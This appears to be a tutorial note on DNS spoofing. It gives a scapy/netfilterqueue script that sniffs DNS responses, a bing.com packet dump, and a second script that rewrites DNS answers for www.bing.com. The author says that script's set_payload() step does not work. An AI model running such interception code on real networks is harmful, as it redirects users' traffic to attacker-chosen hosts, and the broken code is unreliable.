What is DNS Spoofing

Sniff the DNSRR packet and show on the terminal.

  1. #!/usr/bin/env python
  3. from netfilterqueue import NetfilterQueue
  4. from scapy.layers.dns import DNSRR,IP
  6. def process_packet(packet):
  7. scapy_packet = IP(packet.get_payload())
  8. if scapy_packet.haslayer(DNSRR):
  9. print(scapy_packet.show())
  10. packet.accept()
  12. queue = NetfilterQueue()
  13. queue.bind(0, process_packet)
  14. try:
  15. queue.run()
  16. except KeyboardInterrupt:
  17. print('')

Analyze the following DNSRR records.

  1. ###[ IP ]###
  2. version = 4
  3. ihl = 5
  4. tos = 0x0
  5. len = 218
  6. id = 0
  7. flags = DF
  8. frag = 0
  9. ttl = 64
  10. proto = udp
  11. chksum = 0x25e8
  12. src =
  13. dst =
  14. \options \
  15. ###[ UDP ]###
  16. sport = domain
  17. dport = 42647
  18. len = 198
  19. chksum = 0x9388
  20. ###[ DNS ]###
  21. id = 40073
  22. qr = 1
  23. opcode = QUERY
  24. aa = 0
  25. tc = 0
  26. rd = 1
  27. ra = 1
  28. z = 0
  29. ad = 0
  30. cd = 0
  31. rcode = ok
  32. qdcount = 1
  33. ancount = 3
  34. nscount = 1
  35. arcount = 0
  36. \qd \
  37. |###[ DNS Question Record ]###
  38. | qname = 'www.bing.com.'
  39. | qtype = AAAA
  40. | qclass = IN
  41. \an \
  42. |###[ DNS Resource Record ]###
  43. | rrname = 'www.bing.com.'
  44. | type = CNAME
  45. | rclass = IN
  46. | ttl = 2063
  47. | rdlen = None
  48. | rdata = 'a-0001.a-afdentry.net.trafficmanager.net.'
  49. |###[ DNS Resource Record ]###
  50. | rrname = 'a-0001.a-afdentry.net.trafficmanager.net.'
  51. | type = CNAME
  52. | rclass = IN
  53. | ttl = 414
  54. | rdlen = None
  55. | rdata = 'cn.cn-0001.cn-msedge.net.'
  56. |###[ DNS Resource Record ]###
  57. | rrname = 'cn.cn-0001.cn-msedge.net.'
  58. | type = CNAME
  59. | rclass = IN
  60. | ttl = 38
  61. | rdlen = None
  62. | rdata = 'cn-0001.cn-msedge.net.'
  63. \ns \
  64. |###[ DNS SOA Resource Record ]###
  65. | rrname = 'cn-msedge.net.'
  66. | type = SOA
  67. | rclass = IN
  68. | ttl = 38
  69. | rdlen = None
  70. | mname = 'ns1.cn-msedge.net.'
  71. | rname = 'msnhst.microsoft.com.'
  72. | serial = 2017032701
  73. | refresh = 1800
  74. | retry = 900
  75. | expire = 2419200
  76. | minimum = 240
  77. ar = None

Redirecting DNS Responses

  1. #!/usr/bin/env python
  3. from netfilterqueue import NetfilterQueue
  4. from scapy.layers.dns import *
  6. def process_packet(packet):
  7. scapy_packet = IP(packet.get_payload())
  8. if scapy_packet.haslayer(DNSQR):
  9. qname = scapy_packet[DNSQR].qname
  10. if "www.bing.com" in qname.decode(errors='ignore'):
  11. print("[+] Spoofing target")
  12. answer = DNSRR(rrname=qname, rdata="")
  13. scapy_packet[DNS].an = answer
  14. scapy_packet[DNS].ancount = 1
  16. del scapy_packet[IP].len
  17. del scapy_packet[IP].chksum
  18. del scapy_packet[UDP].chksum
  19. del scapy_packet[UDP].len
  21. packet.set_payload(str(scapy_packet).encode())
  23. packet.accept()
  25. queue = NetfilterQueue()
  26. queue.bind(0, process_packet)
  27. try:
  28. queue.run()
  29. except KeyboardInterrupt:
  30. print('')

The set_payload() method does not work....


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